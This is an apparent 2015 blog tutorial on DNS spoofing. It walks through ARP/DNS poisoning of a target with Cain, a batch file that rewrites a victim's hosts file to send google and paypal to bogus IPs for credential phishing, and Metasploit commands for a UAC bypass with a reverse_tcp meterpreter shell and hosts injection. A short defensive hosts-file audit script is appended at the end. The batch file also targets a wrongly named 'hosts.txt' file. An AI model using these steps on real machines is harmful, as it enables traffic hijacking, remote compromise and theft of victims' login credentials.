Wednesday, January 7, 2015

How to do DNS SPOOF (tutorial)?

First, what is DNS? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. For example, http://www.example.com translates to 208.77.188.166.

What does poisoning the DNS allow us to do?

It allows us to redirect the traffic to another website.
First, this is the structure of the network:

1, 2 and 3 are computers.
1 is the computer acting as the gateway (could be a router) (172.128.254.1).
2 is the target computer (172.128.254.10).
3 is the attacker, using Cain.
Note: the IPs are used only for this tutorial and were chosen randomly.
Our work is on computer number 3:
1- After you install Cain, open it and go to the Sniffer tab.
2- Click on Configure and choose your adapter.

3- Enable the sniffer (click on the second icon in the toolbar, next to the open icon).
4- Right-click in the empty area and choose Scan MAC Addresses. We get the results above.
5- Click on the APR tab.
 
6- Click on the + sign in the toolbar to add a new ARP poison routing entry.

7- Choose the gateway, which is 172.128.254.1; in the next list you'll get the IP of computer 2, which is 172.128.254.10. Click OK.

8- Now click on the APR-DNS tab.

9- Click on the + sign.

10- Enter the web address that you want to spoof (in this case, when the user goes to facebook he'll be redirected to myspace), click on Resolve, type the web address that you want to redirect the user to, and click OK; you'll get the IP of that web address. Then click OK.

11- Now, to make this work, we have to enable APR poisoning: click on the icon next to the sniffer icon, and everything should work as we expect.

Now computer 2 will have its routes poisoned, and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com.
Imagine what you can do with this technique.

DNS poisoning using BATCH File

Batch file programming is the native programming offered by the Microsoft Windows operating system. A batch file is created using any text editor such as Notepad, WordPad, WinWord and so on, and consists of a sequence of built-in commands used to perform frequently repeated tasks such as deleting a series of files of the same or different types, creating logs, clearing unwanted junk from your computer, and even creating a batch VIRUS.

DNS poisoning:

A batch file can alter how names are resolved by editing the hosts.txt file that resides at ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it takes you to a malicious website instead of the legitimate one. This may also be used for phishing, i.e. redirecting you to a bogus website that looks exactly like the legitimate one in order to steal credentials.

1. Open Notepad, then copy and paste the code below:

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

2. Save it as a batch file with the extension .bat

3. Then run it on the victim's computer to infect it.

4. This program creates new entries in the hosts file, so that whenever a user attempts to go to www.google.com, he will be redirected to another host that has the IP address 10.199.64.66. Likewise, if the user attempts to log in to a PayPal account by typing in www.paypal.com, he will be redirected to another, external bogus website that has the IP address 10.199.64.67; if the user unknowingly enters credentials there, they end up in the hacker's database and he can use them for several other purposes.

DNS poisoning using Metasploit

Today we will edit the hosts file of a remote PC that has been compromised. By editing the hosts file you can redirect any website to any IP address. We will, of course, use Metasploit.

(1) Hack the remote PC. (How to hack a remote PC?)

(2) Now we will bypass the UAC protection of Windows.

(3) Open a terminal and type the following commands:

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4) Now we will edit the hosts file.

msf > use post/windows/manage/inject_host

msf post(inject_host) > set domain www.google.com

msf post(inject_host) > set ip Your Desired I.P.

msf post(inject_host) > set session 2

msf post(inject_host) > exploit

This will redirect google.com on the victim's PC to your desired IP.
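
A defensive check for the hosts-file tampering described in the batch-file and Metasploit sections, as an added example that is not part of the original post: it parses the text of a hosts file and reports every entry that overrides a name. The allowlist, the reason labels and the sample text are assumptions constructed for illustration.

```python
import ipaddress

# Names a stock hosts file may legitimately define (assumed allowlist, not from the post).
ALLOWED = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}

def audit_hosts(text, allowed=ALLOWED):
    """Return (line_no, hostname, address, reason) for every suspicious entry."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].strip()  # drop full-line and inline comments
        if not entry:
            continue
        addr_text, *names = entry.split()
        try:
            addr = ipaddress.ip_address(addr_text)
        except ValueError:
            findings.append((line_no, " ".join(names), addr_text, "malformed address"))
            continue
        for name in names:  # one line may map several names to the same address
            host = name.lower().rstrip(".")
            if host in allowed:
                if not addr.is_loopback:
                    findings.append((line_no, host, addr_text, "localhost moved off loopback"))
            elif addr.is_loopback or addr.is_unspecified:
                findings.append((line_no, host, addr_text, "name blocked locally"))
            else:
                findings.append((line_no, host, addr_text, "name overridden"))
    return findings

# Constructed sample: a default file, the two entries from the batch file above,
# and one blocklist-style entry to show the difference in classification.
SAMPLE = """\
# Sample hosts file (constructed)
127.0.0.1       localhost
::1             localhost
10.199.64.66 www.google.com
10.199.64.67 www.paypal.com   # appended later
0.0.0.0 ads.example.net
"""

if __name__ == "__main__":
    for line_no, host, addr, reason in audit_hosts(SAMPLE):
        print(f"line {line_no}: {host} -> {addr} ({reason})")
```

On Windows, feed it the contents of `%SystemRoot%\System32\drivers\etc\hosts`, the file the resolver actually consults (it has no extension). Any "name overridden" finding for a public site on a workstation is worth investigating, together with the file's last-modified time.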